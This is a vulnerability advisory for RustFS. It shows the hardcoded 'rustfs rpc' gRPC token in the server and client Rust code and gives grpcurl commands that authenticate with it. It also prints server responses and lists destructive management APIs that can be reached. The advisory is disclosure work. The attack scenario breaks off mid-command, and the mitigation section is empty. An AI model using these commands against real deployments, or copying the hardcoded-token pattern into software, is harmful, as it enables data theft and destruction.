Description

RustFS has a gRPC Hardcoded Token Authentication Bypass ## Vulnerability Overview ### Description RustFS implements gRPC authentication using a hardcoded static token "rustfs rpc" that is: 1. Publicly exposed in the source code repository 2. Hardcoded on both client and server sides 3. Non-configurable with no mechanism for token rotation 4. Universally valid across all RustFS deployments Any attacker with network access to the gRPC port can authenticate using this publicly known token and execute privileged operations including data destruction, policy manipulation, and cluster configuration changes. ### CVSS 3.1 Score Score: 9.8 (Critical) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - Attack Vector (AV): Network - Exploitable remotely - Attack Complexity (AC): Low - No special conditions required - Privileges Required (PR): None - No authentication needed (bypassed) - User Interaction (UI): None - Fully automated exploitation - Scope (S): Unchanged - Impact contained to vulnerable component - Confidentiality (C): High - Complete data disclosure - Integrity (I): High - Complete data modification capability - Availability (A): High - Complete service disruption capability --- ## Vulnerable Code Analysis ### Server-Side Authentication (rustfs/src/server/http.rs:679-686) rust #[allow(clippy::result_large_err)] fn check_auth(req: Request<()>) -> std::result::Result<Request<()>, Status> { let token: MetadataValue<_> = "rustfs rpc".parse().unwrap(); // ⚠️ HARDCODED! match req.metadata().get("authorization") { Some(t) if token == t => Ok(req), _ => Err(Status::unauthenticated("No valid auth token")), } } Issues: - Static token hardcoded as string literal - No configuration mechanism (environment variable, file, etc.) - Token visible in public GitHub repository - Identical across all installations ### Client-Side Authentication (crates/protos/src/lib.rs:153-174) rust pub async fn node_service_time_out_client( addr: &String, ) -> Result<NodeServiceClient<...>, Box<dyn Error>> { let token: MetadataValue<_> = "rustfs rpc".parse()?; // ⚠️ SAME HARDCODED TOKEN! // ... Ok(NodeServiceClient::with_interceptor( channel, Box::new(move |mut req: Request<()>| { req.metadata_mut().insert("authorization", token.clone()); Ok(req) }), )) } Issues: - Client uses identical hardcoded token - No secure token distribution mechanism - Token cannot be rotated without code changes ### Service Integration (rustfs/src/server/http.rs:520-521) rust let rpc_service = NodeServiceServer::with_interceptor(make_server(), check_auth); let service = hybrid(s3_service, rpc_service); The check_auth interceptor is applied to all gRPC services via NodeServiceServer::with_interceptor, protecting all 50+ gRPC methods in node.proto with the same weak authentication. --- ## Reproduction Steps ### Environment Setup Test Environment: - RustFS Server: localhost:9000 (HTTP + gRPC hybrid service) - RustFS Console: localhost:9001 - Container: rustfs/rustfs:latest (Docker Compose deployment) - Default credentials: rustfsadmin/rustfsadmin Tools Required: - grpcurl v1.9.3+ (gRPC command-line client) - RustFS proto files: crates/protos/src/node.proto ### Step 1: Verify Authentication is Enforced Test 1.1: Request without authentication token bash $ grpcurl -plaintext \ -import-path /private/tmp/rustfs/crates/protos/src \ -proto node.proto \ -d '{}' \ localhost:9000 node_service.NodeService/Ping Expected Result: ✅ Authentication failure ERROR: Code: Unauthenticated Message: No valid auth token Test 1.2: Request with incorrect token bash $ grpcurl -plaintext \ -H 'authorization: wrong-token-12345' \ -import-path /private/tmp/rustfs/crates/protos/src \ -proto node.proto \ -d '{}' \ localhost:9000 node_service.NodeService/Ping Expected Result: ✅ Authentication failure ERROR: Code: Unauthenticated Message: No valid auth token Conclusion: Authentication is properly enforced - unauthorized requests are rejected. --- ### Step 2: Extract Hardcoded Token from Source Code Public Source Code Analysis: bash $ git clone https://github.com/rustfs/rustfs.git $ cd rustfs $ grep -rn '"rustfs rpc"' --include='*.rs' Result: ✅ Token found in public source code rustfs/src/server/http.rs:680: let token: MetadataValue<_> = "rustfs rpc".parse().unwrap(); crates/protos/src/lib.rs:153: let token: MetadataValue<_> = "rustfs rpc".parse()?; Extracted Token: rustfs rpc --- ### Step 3: Exploit - Authenticate Using Hardcoded Token Test 3.1: Successful authentication with hardcoded token bash $ grpcurl -plaintext \ -H 'authorization: rustfs rpc' \ -import-path /private/tmp/rustfs/crates/protos/src \ -proto node.proto \ -d '{}' \ localhost:9000 node_service.NodeService/Ping Result: 🔓 AUTHENTICATION BYPASSED json { "version": "1", "body": "DAAAAAAABgAIAAQABgAAAAQAAAANAAAAaGVsbG8sIGNhbGxlcgAAAA==" } Analysis: Server accepted the hardcoded token and returned a successful response. Authentication completely bypassed. --- ### Step 4: Demonstrate Access to Sensitive Management APIs Test 4.1: Server Configuration Disclosure bash $ grpcurl -plaintext \ -H 'authorization: rustfs rpc' \ -import-path /private/tmp/rustfs/crates/protos/src \ -proto node.proto \ -d '{}' \ localhost:9000 node_service.NodeService/ServerInfo Result: ✅ Complete server configuration disclosed json { "success": true, "serverProperties": "n6ZvbmxpbmWsMC4wLjAuMDo5MDAwoM0DhdkjMjAyNS0xMi0xOVQwNjo1NzoxOVpAMS4wLjAtYWxwaGEuNzaggawwLjAuMC4wOjkwMDCmb25saW5llNwAGq0vZGF0YS9ydXN0ZnMwwq0vZGF0YS9ydXN0ZnMwwsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAANwAGq0vZGF0YS9ydXN0ZnMxwq0vZGF0YS9ydXN0ZnMxwsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAAdwAGq0vZGF0YS9ydXN0ZnMywq0vZGF0YS9ydXN0ZnMywsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAAtwAGq0vZGF0YS9ydXN0ZnMzwq0vZGF0YS9ydXN0ZnMzwsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAAwGRAZUAAAAAAAAAoIA=" } Analysis: - Server returned complete configuration including storage paths, endpoint addresses, version info - Binary data contains sensitive internal state (MessagePack encoded) - Information disclosure confirmed Test 4.2: Disk Information Access bash $ grpcurl -plaintext \ -H 'authorization: rustfs rpc' \ -import-path /private/tmp/rustfs/crates/protos/src \ -proto node.proto \ -d '{}' \ localhost:9000 node_service.NodeService/DiskInfo Result: ✅ Authenticated request accepted (business logic error returned, not auth error) json { "error": { "code": 36, "errorInfo": "io error can not find disk" } } Analysis: - Request passed authentication (error is business logic, not authentication) - Proves attacker has authenticated access to sensitive system information APIs --- ## Impact Analysis ### Affected APIs All 50+ gRPC methods in node_service.NodeService are vulnerable: #### 🔴 CRITICAL Impact - Data Destruction - DeleteBucket - Delete production buckets - DeleteVolume - Destroy entire storage volumes - DeleteUser - Remove legitimate users - DeletePolicy - Remove access control policies - DeleteServiceAccount - Remove service accounts #### 🔴 CRITICAL Impact - Configuration Manipulation - ReloadSiteReplicationConfig - Corrupt cluster replication - SignalService - Control service lifecycle - LoadPolicy - Modify access control policies - LoadPolicyMapping - Alter policy assignments #### 🟠 HIGH Impact - Unauthorized Data Access/Modification - ReadAll / ReadAt - Read arbitrary data - WriteAll / WriteStream - Inject malicious data - RenameFile / RenameData - Manipulate file system - UpdateMetadata / WriteMetadata - Corrupt metadata #### 🟠 HIGH Impact - Privilege Escalation - LoadUser - Access user credentials - LoadServiceAccount - Access service credentials - LoadGroup - Access group memberships #### 🟡 MEDIUM Impact - Information Disclosure - ServerInfo - Server configuration disclosure - DiskInfo - Storage configuration disclosure - GetMetrics - Performance metrics disclosure - GetBucketStats - Bucket statistics disclosure - LocalStorageInfo - Storage system information - ListBucket - Bucket enumeration #### 🟡 MEDIUM Impact - Cluster Operations - MakeBucket - Unauthorized bucket creation - HealBucket - Trigger repair operations - BackgroundHealStatus - Monitor internal operations ### Attack Scenarios #### Scenario 1: Data Destruction ```bash # Enumerate all buckets grpcurl -plaintext -H 'authorization: rustfs rpc'

Mitigation

Aliases

References